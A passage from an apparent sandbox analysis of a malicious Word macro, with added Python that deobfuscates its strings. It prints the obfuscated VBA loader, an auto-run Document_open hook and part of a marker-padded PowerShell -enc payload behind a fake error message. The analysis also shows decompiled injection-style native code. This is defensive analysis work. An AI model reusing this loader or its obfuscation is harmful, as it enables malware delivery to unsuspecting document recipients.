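Dim ZJLnFB as Double
ZJLnFB = lmdMEA ^ (1 / 3)
If Fix(ZJLnFB) ^ 3 = lmdMEA Then
fZVmJ = True
Elseif (Fix(ZJLnFB) + 1) ^ 3 = lmdMEA Then
fZVmJ = True
Endif
PNjoAGP:
Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)
Goto shylMG
Set cuCYC = GlHkEN
shylMG:
Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)
Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw
"""

GOTO_RE = re.compile(r"^\s*GoTo\s+(\w+)\s*$", re.IGNORECASE)
LABEL_RE = re.compile(r"^\s*(\w+):\s*$")


def strip_goto_dead_code(vba):
    """Drop every 'Goto L' ... 'L:' block from a VBA listing.

    The lines between an unconditional Goto and the label it names can only
    run if something else jumps into them.  The region is skipped only when
    the first label after the Goto is the Goto's own target, so no other
    label (and therefore no other jump) sits inside it.  The Goto and the
    label are dropped too, leaving only instructions that were reachable.
    """
    lines = vba.splitlines()
    keep = []
    i = 0
    while i < len(lines):
        m = GOTO_RE.match(lines[i])
        if m:
            target = m.group(1)
            end = None
            for j in range(i + 1, len(lines)):
                lm = LABEL_RE.match(lines[j])
                if lm is None:
                    continue
                if lm.group(1) == target:
                    end = j
                break            # first label decides: target or not sealed
            if end is not None:
                i = end + 1      # skip the whole dead region
                continue
        keep.append(lines[i])
        i += 1
    return keep


def dead_code_ratio(vba):
    """Fraction of lines removed: a cheap opacity score for triage."""
    total = len(vba.splitlines())
    if not total:
        return 0.0
    return 1.0 - len(strip_goto_dead_code(vba)) / total


if __name__ == "__main__":
    for line in strip_goto_dead_code(SAMPLE_VBA):
        print(line)
    print("dead code: %.0f%%" % (100 * dead_code_ratio(SAMPLE_VBA)))
```

On the constructed excerpt four of twenty-two lines survive: the string concatenation, the decoder call, CreateObject and Create, which is the entire useful behaviour of the function.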

APIs / Meta Information for Ipls8rqp952u2lk1 (in call order): zCXyyY, Fix, JSrfhd, JSrfhd, Fix, Fix, szALCGBF, Fix, XFTxEQJDN, XFTxEQJDN, Fix, Fix, Replace and H1kcw0gko9w6ta3y (both part of subcall function Cws3jiyt47ovpsrhug@Gx8fznt8p0b), YjbuICHY, Fix, RXvmIZQm, RXvmIZQm, Fix, Fix, rUIOAx, Fix, gIKrmCJj, gIKrmCJj, Fix, Fix

Function Ipls8rqp952u2lk1 (module Gx8fznt8p0b), with sandbox meta information as trailing ' comments:

Function Ipls8rqp952u2lk1(V8_prqa_b590f6uz6z)
    On Error Resume Next    ' executed
    Goto JSrfhd
    Set llWECD = zCXyyY
    Dim xbIYArN as Double
    xbIYArN = Fix(JSrfhd)
    If xbIYArN <> JSrfhd Then
        Exit Function
    Endif
    Dim zHdGqDLim as Double
    zHdGqDLim = xbIYArN ^ (1 / 3)
    If Fix(zHdGqDLim) ^ 3 = xbIYArN Then
        iTfwbHGDH = True
    Elseif (Fix(zHdGqDLim) + 1) ^ 3 = xbIYArN Then
        iTfwbHGDH = True
    Endif
JSrfhd:
    Hvdntqk_ku4y1u_ = V8_prqa_b590f6uz6z
    Goto XFTxEQJDN
    Set vRYIMlBHH = szALCGBF
    Dim vEHmFIM as Double
    vEHmFIM = Fix(XFTxEQJDN)
    If vEHmFIM <> XFTxEQJDN Then
        Exit Function
    Endif
    Dim dTSeMQG as Double
    dTSeMQG = vEHmFIM ^ (1 / 3)
    If Fix(dTSeMQG) ^ 3 = vEHmFIM Then
        MiKCE = True
    Elseif (Fix(dTSeMQG) + 1) ^ 3 = vEHmFIM Then
        MiKCE = True
    Endif
XFTxEQJDN:
    Xz0p6qe4s08b07kkt = Cws3jiyt47ovpsrhug(Hvdntqk_ku4y1u_)
    Goto RXvmIZQm
    Set GDDUGJd = YjbuICHY
    Dim GdxqnN as Double
    GdxqnN = Fix(RXvmIZQm)
    If GdxqnN <> RXvmIZQm Then
        Exit Function
    Endif
    Dim DqmzWgJHy as Double
    DqmzWgJHy = GdxqnN ^ (1 / 3)
    If Fix(DqmzWgJHy) ^ 3 = GdxqnN Then
        NhxAGvAH = True
    Elseif (Fix(DqmzWgJHy) + 1) ^ 3 = GdxqnN Then
        NhxAGvAH = True
    Endif
RXvmIZQm:
    Ipls8rqp952u2lk1 = Xz0p6qe4s08b07kkt
    Goto gIKrmCJj
    Set InptugrzA = rUIOAx
    Dim UDFpCBJJ as Double
    UDFpCBJJ = Fix(gIKrmCJj)
    If UDFpCBJJ <> gIKrmCJj Then
        Exit Function
    Endif
    Dim zKEHRtJGG as Double
    zKEHRtJGG = UDFpCBJJ ^ (1 / 3)
    If Fix(zKEHRtJGG) ^ 3 = UDFpCBJJ Then
        SrmTEEB = True
    Elseif (Fix(zKEHRtJGG) + 1) ^ 3 = UDFpCBJJ Then
        SrmTEEB = True
    Endif
gIKrmCJj:
End Function


APIs / Meta Information for Cws3jiyt47ovpsrhug: Replace, H1kcw0gko9w6ta3y. Both recorded Replace calls follow; the first recovers the WMI moniker, the second the cmd line that was handed to Win32_Process.Create:

                      Replace("ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[vw]xm[vw]xm[vsw]xm[vw]xm[vw]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[vw]xm[vpw]xm[vw]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v","w]xm[v",) -> winmgmts:win32_process Replace("w]xm[vw]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[v/w]xm[vcw]xm[v w]xm[vmw]xm[v^w]xm[vsw]xm[v^w]xm[vgw]xm[v w]xm[v%w]xm[vuw]xm[vsw]xm[vew]xm[vrw]xm[vnw]xm[vaw]xm[vmw]xm[vew]xm[v%w]xm[v w]xm[v/w]xm[vvw]xm[v w]xm[vWw]xm[vow]xm[v^w]xm[vrw]xm[vdw]xm[v w]xm[vew]xm[vxw]xm[vpw]xm[v^w]xm[vew]xm[vrw]xm[viw]xm[vew]xm[vnw]xm[v^w]xm[vcw]xm[vew]xm[vdw]xm[v w]xm[vaw]xm[vnw]xm[v w]xm[vew]xm[vrw]xm[v^w]xm[vrw]xm[vow]xm[vrw]xm[v w]xm[vtw]xm[vrw]xm[vyw]xm[viw]xm[v^w]xm[vnw]xm[vgw]xm[v w]xm[vtw]xm[vow]xm[v w]xm[vow]xm[vpw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[vtw]xm[vhw]xm[v^w]xm[vew]xm[v w]xm[vfw]xm[viw]xm[v^w]xm[vlw]xm[vew]xm[v.w]xm[v w]xm[v&w]xm[v w]xm[vpw]xm[v^w]xm[vow]xm[vww]xm[vew]xm[v^w]xm[vrw]xm[vsw]xm[v^w]xm[vhw]xm[vew]xm[v^w]xm[vlw]xm[vlw]xm[v^w]xm[v w]xm[v-w]xm[vww]xm[v w]xm[vhw]xm[viw]xm[v^w]xm[vdw]xm[vdw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[v-w]xm[v^w]xm[vew]xm[v^w]xm[vnw]xm[vcw]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v 
IAAw]xm[vgACw]xm[vQAOw]xm[vABaw]xm[vAEcw]xm[vAIAw]xm[vAgAw]xm[vD0Aw]xm[vIABw]xm[vbAHw]xm[vQAWw]xm[vQBww]xm[vAGUw]xm[vAXQw]xm[vAoAw]xm[vCIAw]xm[vewAw]xm[vyAHw]xm[v0Aew]xm[vwA1w]xm[vAH0w]xm[vAeww]xm[vAwAw]xm[vH0Aw]xm[vewAw]xm[vxAHw]xm[v0Aew]xm[vwAzw]xm[vAH0w]xm[vAeww]xm[vA0Aw]xm[vH0Aw]xm[vIgAw]xm[vtAGw]xm[vYAIw]xm[vAAnw]xm[vAFQw]xm[vARQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vtACw]xm[v4AJw]xm[vwAsw]xm[vACcw]xm[vAUww]xm[vB5Aw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkAbw]xm[vwAnw]xm[vACww]xm[vAJww]xm[vAuAw]xm[vEQAw]xm[vSQBw]xm[vyAEw]xm[vUAQw]xm[vwB0w]xm[vAE8w]xm[vAUgw]xm[vBZAw]xm[vCcAw]xm[vLAAw]xm[vnAFw]xm[vMAJw]xm[vwApw]xm[vADsw]xm[vAIAw]xm[vAgAw]xm[vCAAw]xm[vJABw]xm[vEADw]xm[vAAQw]xm[vwBxw]xm[vACAw]xm[vAPQw]xm[vAgAw]xm[vFsAw]xm[vVABw]xm[vZAHw]xm[vAAZw]xm[vQBdw]xm[vACgw]xm[vAIgw]xm[vB7Aw]xm[vDIAw]xm[vfQBw]xm[v7ADw]xm[vEAfw]xm[vQB7w]xm[vADAw]xm[vAfQw]xm[vB7Aw]xm[vDMAw]xm[vfQBw]xm[v7ADw]xm[vQAfw]xm[vQAiw]xm[vACAw]xm[vALQw]xm[vBmAw]xm[vCcAw]xm[vcwBw]xm[vFAHw]xm[vIAdw]xm[vgBJw]xm[vAEMw]xm[vARQw]xm[vBQAw]xm[vG8Aw]xm[vJwAw]xm[vsACw]xm[vcAVw]xm[vABlw]xm[vAG0w]xm[vALgw]xm[vBuAw]xm[vEUAw]xm[vdAAw]xm[vuACw]xm[vcALw]xm[vAAnw]xm[vAFMw]xm[vAWQw]xm[vBzAw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkATw]xm[vgB0w]xm[vAG0w]xm[vAYQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vuAEw]xm[vEARw]xm[vwBFw]xm[vAFIw]xm[vAJww]xm[vApAw]xm[vCAAw]xm[vOwAw]xm[vgACw]xm[vQASw]xm[vgBiw]xm[vAHow]xm[vAMww]xm[vB5Aw]xm[vGEAw]xm[vYQAw]xm[v9ACw]xm[vQARw]xm[vAA1w]xm[vADMw]xm[vARQw]xm[vAgAw]xm[vCsAw]xm[vIABw]xm[vbAGw]xm[vMAaw]xm[vABhw]xm[vAHIw]xm[vAXQw]xm[vAoAw]xm[vDYAw]xm[vNAAw]xm[vpACw]xm[vAAKw]xm[vwAgw]xm[vACQw]xm[vAUgw]xm[vA3Aw]xm[vDYAw]xm[vUAAw]xm[v7ACw]xm[vQARw]xm[vwA3w]xm[vADMw]xm[vATww]xm[vA9Aw]xm[vCgAw]xm[vJwBw]xm[vGACw]xm[vcAKw]xm[vwAow]xm[vACcw]xm[vAMAw]xm[vAnAw]xm[vCsAw]xm[vJwAw]xm[v0AFw]xm[vYAJw]xm[vwApw]xm[vACkw]xm[vAOww]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vgACw]xm[vAARw]xm[vwBlw]xm[vAHQw]xm[vALQw]xm[vBWAw]xm[vGEAw]xm[vcgBw]xm[vJAEw]xm[vEAQw]xm[vgBsw]xm[vAGUw]xm[vAIAw]xm[vAoAw]xm[vCIAw]xm[vOABw]xm[vaACw]xm[vIAKw]xm[vwAiw]xm[vAGcw]xm[vAIgw]xm[vAp
Aw]xm[vCAAw]xm[vIAAw]xm[vtAHw]xm[vYAQw]xm[vQBsw]xm[vAFUw]xm[vAZQw]xm[vBPAw]xm[vE4Aw]xm[vIAAw]xm[vpADw]xm[voAOw]xm[vgAiw]xm[vAGMw]xm[vAcgw]xm[vBFAw]xm[vGAAw]xm[vQQBw]xm[vgAFw]xm[vQAZw]xm[vQBEw]xm[vAGkw]xm[vAUgw]xm[vBgAw]xm[vGUAw]xm[vQwBw]xm[v0AGw]xm[vAAbw]xm[vwBSw]xm[vAHkw]xm[vAIgw]xm[vAoAw]xm[vCQAw]xm[vSABw]xm[vPAEw]xm[v0ARw]xm[vQAgw]xm[vACsw]xm[vAIAw]xm[vAoAw]xm[vCgAw]xm[vJwBw]xm[v0AEw]xm[vsAJw]xm[vwArw]xm[vACgw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKwAw]xm[vnAEw]xm[vsAJw]xm[vwArw]xm[vACcw]xm[vAagw]xm[vBsAw]xm[vDQAw]xm[vOABw]xm[vrAHw]xm[vIAJw]xm[vwApw]xm[vACsw]xm[vAJww]xm[vB0Aw]xm[vCcAw]xm[vKwAw]xm[voACw]xm[vcASw]xm[vwBMw]xm[vAE4w]xm[vAcQw]xm[vAnAw]xm[vCsAw]xm[vJwBw]xm[vtADw]xm[vkAJw]xm[vwApw]xm[vACsw]xm[vAKAw]xm[vAnAw]xm[vHQAw]xm[vJwAw]xm[vrACw]xm[vcAew]xm[vQA5w]xm[vACcw]xm[vAKQw]xm[vArAw]xm[vCcAw]xm[vdAAw]xm[vnACw]xm[vsAJw]xm[vwBLw]xm[vAEww]xm[vAJww]xm[vApAw]xm[vC0Aw]xm[vcgBw]xm[vlAHw]xm[vAAbw]xm[vABBw]xm[vAGMw]xm[vAZQw]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vnAHw]xm[vQASw]xm[vwAnw]xm[vACsw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKQAw]xm[vsAFw]xm[vsAQw]xm[vwBIw]xm[vAEEw]xm[vAcgw]xm[vBdAw]xm[vDkAw]xm[vMgAw]xm[vpACw,"w]xm[v",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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

Decrypted strings: "w]xm[v"

Function Cws3jiyt47ovpsrhug (module Gx8fznt8p0b), with sandbox meta information as a trailing ' comment:

Function Cws3jiyt47ovpsrhug(Mhb7dz_hsybhf0ic7)
    Cws3jiyt47ovpsrhug = Replace(Mhb7dz_hsybhf0ic7, "w]xm[v", H1kcw0gko9w6ta3y)    ' executed: Replace("ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[vw]xm[vw]xm[vsw]xm[vw]xm[vw]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[vw]xm[vpw]xm[vw]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v", "w]xm[v", ) -> winmgmts:win32_process
End Function

H1kcw0gko9w6ta3y is never assigned anywhere in the listing, and the recorded call shows the third argument as empty, so Replace simply deletes every occurrence of the "w]xm[v" marker. That single substitution is the whole "decryption": the payload strings are plain text with the marker inserted between characters.
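Cws3jiyt47ovpsrhug and Ipls8rqp952u2lk1 together are the whole string decoder: drop four leading characters (Mid(dsfe, 5, Len(dsfe))), delete every "w]xm[v" marker, and what remains is a cmd.exe line that hides its keywords behind carets and ends in powershell -enc. The Python below re-implements that chain as an added example (editor's code, not the sandbox's or the macro's), then undoes the caret escaping and decodes the -EncodedCommand value (base64 over UTF-16LE). The trace shows the decoded cmd line but the base64 blob itself was removed from the page, so the script encodes a constructed stand-in one-liner and builds a constructed marker-padded string around it; the only real input is the "winmgmts:win32_process" string from the recorded Replace call.

```python
import base64
import re

MARKER = "w]xm[v"   # the one "decrypted string" the sandbox reports for the macro

# Raw input of the first recorded Replace call (taken from the trace above).
WMI_MONIKER_RAW = ("ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[vw]xm[vw]xm[vsw]xm[vw]xm[vw]xm[v"
                   ":ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[vw]xm[vpw]xm[vw]xm[vrow]xm[v"
                   "w]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v")


def cws3jiyt47ovpsrhug(s):
    """Cws3jiyt47ovpsrhug re-implemented: Replace(s, "w]xm[v", H1kcw0gko9w6ta3y).
    H1kcw0gko9w6ta3y is never assigned, so VBA passes an empty string and the
    marker is deleted (the recorded call shows the third argument empty)."""
    return s.replace(MARKER, "")


def recover_create_argument(dsfe):
    """The first argument of Sy6vvpgixx8z_5f.Create:
    Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))) -- drop four leading
    characters, then strip the marker."""
    return cws3jiyt47ovpsrhug(dsfe[4:])


def strip_cmd_carets(cmdline):
    """cmd.exe treats ^ as an escape for the next character: m^s^g is parsed
    as msg and p^owe^rs^he^ll^  as 'powershell ' (caret-space is a space)."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def decode_encoded_command(cmdline):
    """Return the script behind powershell -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-enc in
    this sample; -e also works in practice); the value is base64 of UTF-16LE."""
    tokens = strip_cmd_carets(cmdline).split()
    for i in range(len(tokens) - 1):
        tok = tokens[i]
        if tok[:1] not in "-/":
            continue
        name = tok[1:].lower()
        if name == "e" or (len(name) >= 2 and "encodedcommand".startswith(name)):
            return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
    return None


# --- constructed test input ---------------------------------------------
# The page shows the decoded cmd line but the base64 blob was removed from the
# trace, so a stand-in PowerShell one-liner is encoded here.  Everything below
# is constructed for the demonstration; it is not the sample's payload.
STANDIN_SCRIPT = "Write-Host 'stand-in for the removed payload'"
STANDIN_B64 = base64.b64encode(STANDIN_SCRIPT.encode("utf-16-le")).decode("ascii")
CONSTRUCTED_CMD = (
    "cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng "
    "to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + STANDIN_B64
)


def obfuscate_like_macro(plain, prefix="\x01 ??"):
    """Inverse of recover_create_argument, used only to build a dsfe for the
    demo: four throw-away characters, then the marker after every character.
    (The real string spaces its markers irregularly; the decoder does not care.)"""
    return prefix + "".join(c + MARKER for c in plain)


if __name__ == "__main__":
    dsfe = obfuscate_like_macro(CONSTRUCTED_CMD)
    cmdline = recover_create_argument(dsfe)
    print(strip_cmd_carets(cmdline))
    print(decode_encoded_command(cmdline))
```

Because the marker is removed by a single pass and never re-scanned, no ordering of payload characters can create a false marker, which is why the macro can afford to place "w]xm[v" after every character without escaping anything; the same property makes the decoder safe to run over the whole 16527-character string in one step.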

Module: Kyl0l3rqw280c6ssa

Declaration:

Attribute VB_Name = "Kyl0l3rqw280c6ssa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

VB_Base = "1Normal.ThisDocument" together with VB_PredeclaredId = True identifies this as the document's ThisDocument class module, which is why its Document_open handler below runs automatically once the file is opened with macros enabled.


Executed Functions

APIs / Meta Information (every entry recorded as part of subcall function Bn2p1rxokklh_9o8@Gx8fznt8p0b, in call order): Xaem5y61ivq, Hj9iyfe3bvb, StoryRanges, wdMainTextStory, Xrsb1iydy1_t2h, ykgfGkNf, Fix, BzbdEl, BzbdEl, Fix, Fix, mZXJjJAgq, Fix, JfXdCsEp, JfXdCsEp, Fix, Fix, MSsFhG, Fix, DJlZDCM, DJlZDCM, Fix, Fix, VDhTuRJ, Fix, QWDldHHR, QWDldHHR, Fix, Fix, Mid, Name, Application, FBkjB, Fix, reejhCJo, reejhCJo, Fix, Fix, ICwOHad, Fix, PNjoAGP, PNjoAGP, Fix, Fix, GlHkEN, Fix, shylMG, shylMG, Fix, Fix, CreateObject, nDpnHa, Fix, neULB, neULB, Fix, Fix, SgwfJAm, Fix, aDUvJDOI, aDUvJDOI, Fix, Fix, GqPOTjZ, Fix, xSGbCJ, xSGbCJ, Fix, Fix, Create, Mid, Len, Vc1971csmq7a5g9, W7x42qfm4_lw, dUNUgHJG, Fix, kshfoytP, kshfoytP, Fix, Fix, SetWuCGdA, Fix, ZYHZlIii, ZYHZlIii, Fix, Fix

StoryRanges and wdMainTextStory are the Word object-model calls that read a document's main body text; they appear before Mid, CreateObject and Create, consistent with the marker-padded string dsfe being stored in the document body rather than in the macro itself.

                      Line  Instruction                    Meta Information
                      9     Private Sub Document_open()
                      10    Bn2p1rxokklh_9o8               executed
                      11    End Sub
                      Module: P0_myy5fnenf

                      Declaration
                      Line  Content
                      1     Attribute VB_Name = "P0_myy5fnenf"

                        Executed Functions

                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64e3dd6d9a0bc953f5368c61396ad13fbb4d2c6c2142fff538e2c445a345eee7
                        • Instruction ID: e516825b5104771ff4c923765d245b995fb3698d802ac58308c7bfaa634b3936
                        • Opcode Fuzzy Hash: 64e3dd6d9a0bc953f5368c61396ad13fbb4d2c6c2142fff538e2c445a345eee7
                        • Instruction Fuzzy Hash: 11B1112151E7D28FD75387789C696A13FB0AF57210B0A01EBD488CF0B3D6595E9AC3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d18cb070a7fb38f1667df6698750856447298eea527e7e7bfabd3235712e5d4
                        • Instruction ID: 65c7505882b65539fcd6537376b622dc72464a151dca83072dbc2b039165c6b8
                        • Opcode Fuzzy Hash: 5d18cb070a7fb38f1667df6698750856447298eea527e7e7bfabd3235712e5d4
                        • Instruction Fuzzy Hash: 4731226194E7D24FD70387385C656A03FB0AF17210B0A05E7D088CF0F3D9599E9AC3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a53b4833ab36b37f7ee18f243b27d5993a0bda0363faaae08db45f43d8016288
                        • Instruction ID: 907f84791dc90babc7d170cc6992bd1b0f534e2234cacbb8dc3d35ed3c757742
                        • Opcode Fuzzy Hash: a53b4833ab36b37f7ee18f243b27d5993a0bda0363faaae08db45f43d8016288
                        • Instruction Fuzzy Hash: AC21CD6295E7D24FD70353746C6A2E17FA0AF57254F0E42E7D484CE0A3E64A0A9AC363
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000005.00000002.2096418606.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e4abfb733bdfb14a344b89e87ff55ba5796e4f5ed37f27791f945f0c713c9e8
                        • Instruction ID: c63fa5e5658b82f7fd208ed7cd54b92f7341445b08803b01bfd70ef7609ed166
                        • Opcode Fuzzy Hash: 3e4abfb733bdfb14a344b89e87ff55ba5796e4f5ed37f27791f945f0c713c9e8
                        • Instruction Fuzzy Hash: 1B01E56195E7D24FD30353746D2A2D47FB0AF53254F0E41E7D485CF0A3E64A0A9AC362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        C-Code - Quality: 58%
                        			E10002A7E(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* _t30;
                        				intOrPtr* _t36;
                        				void* _t37;
                        				signed int _t39;
                        
                        				E1001DA49(_t30);
                        				_v20 = 0x467731;
                        				_v16 = 0;
                        				_v12 = 0x472a;
                        				_v12 = _v12 + 0xffff7b40;
                        				_v12 = _v12 + 0xffffef38;
                        				_v12 = _v12 ^ 0xffffe9c4;
                        				_v8 = 0x3c5a;
                        				_t39 = 0x79;
                        				_v8 = _v8 / _t39;
                        				_v8 = _v8 + 0xe4e9;
                        				_v8 = _v8 ^ 0x0000c838;
                        				_t36 = E10005C61(0x7bb52d4d, 0x202, 0xfe955d23);
                        				_t37 =  *_t36(0, _a16, 0, 0, _a4, __ecx, 0, _a4, 0, _a12, _a16, _a20, _a24, 0); // executed
                        				return _t37;
                        			}
                        Instruction addresses: 0x10002a9a 0x10002a9f 0x10002aa8 0x10002aab 0x10002ab2 0x10002ab9 0x10002ac0 0x10002ac7 0x10002ad3 0x10002ade 0x10002ae1 0x10002ae8 0x10002aff 0x10002b10 0x10002b16

                        APIs
                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,FFFFE9C4,?,?,?,?,?,?,?,?,?,00000000), ref: 10002B10
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: FolderPath
                        • String ID: *G$1wF$Z<
                        • API String ID: 1514166925-2208826043
                        • Opcode ID: 54bbc501c4f77dbf5ec68676d9fbf33ac628e155891657d84bac3197445bb72e
                        • Instruction ID: 4dfd91e235e978a8a621c6a64ff8a08886502bdd2d81794e7770737d8ae05b32
                        • Opcode Fuzzy Hash: 54bbc501c4f77dbf5ec68676d9fbf33ac628e155891657d84bac3197445bb72e
                        • Instruction Fuzzy Hash: 72115776801218FBDF10DFE5D8098CEBFB5EF05360F108189B908662A0D3754B61DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 00000007.00000002.2088409630.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E1001DA4A(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* _t32;
                        				void* _t37;
                        				WCHAR* _t45;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t45 = __ecx;
                        				_push(0);
                        				_push(_a40);
                        				_push(_a36);
                        				_push(_a32);
                        				_push(_a28);
                        				_push(_a24);
                        				_push(0);
                        				_push(_a16);
                        				_push(_a12);
                        				_push(_a8);
                        				_push(_a4);
                        				_push(__ecx);
                        				E1001DA49(_t32);
                        				_v8 = 0xa30a;
                        				_v8 = _v8 + 0xe546;
                        				_v8 = _v8 << 6;
                        				_v8 = _v8 | 0xbe0b0289;
                        				_v8 = _v8 ^ 0xbe6b5086;
                        				_v12 = 0x62;
                        				_v12 = _v12 | 0x3cb13658;
                        				_v12 = _v12 + 0xffff4721;
                        				_v12 = _v12 ^ 0x3cb076f0;
                        				E10005C61(0xd9ce7b11, 0xd7, 0xbc6fde34);
                        				_t37 = CreateFileW(_t45, _a24, _a32, 0, _a16, _a28, 0); // executed
                        				return _t37;
                        			}
                        Instruction addresses: 0x1001da4d 0x1001da4e 0x1001da53 0x1001da55 0x1001da56 0x1001da59 0x1001da5c 0x1001da5f 0x1001da62 0x1001da65 0x1001da66 0x1001da69 0x1001da6c 0x1001da6f 0x1001da73 0x1001da74 0x1001da79 0x1001da83 0x1001da8f 0x1001da93 0x1001da9a 0x1001daa1 0x1001daa8 0x1001daaf 0x1001dab6 0x1001dacd 0x1001dae4 0x1001daeb

                        APIs
                        • CreateFileW.KERNEL32(?,?,?,00000000,339DF2AD,B78798A3,00000000), ref: 1001DAE4
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2092284281.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000007.00000002.2092306560.000000001001F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: CreateFile
                        • String ID: F$b
                        • API String ID: 823142352-411355777
                        • Opcode ID: 69fdc3fa9d72879a0da2db329fddd41aeb27e9de262caeebf668ecc3c02f5a9d
                        • Instruction ID: 8bab848c21193ffcdcbde572ca9f4c1c5807ab98bdb15a7aa53bb8d743ad64b8
                        • Opcode Fuzzy Hash: 69fdc3fa9d72879a0da2db329fddd41aeb27e9de262caeebf668ecc3c02f5a9d
                        • Instruction Fuzzy Hash: 3B110676901248FFDF018FD5DD0ACDE7F7AEF99314F158149FA0462120D3729A20ABA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E10010F67(int __ecx, short* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                        				unsigned int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				void* _t26;
                        				void* _t33;
                        				signed int _t35;
                        				short* _t40;
                        				int _t41;
                        
                        				_push(_a12);
                        				_t40 = __edx;
                        				_t41 = __ecx;
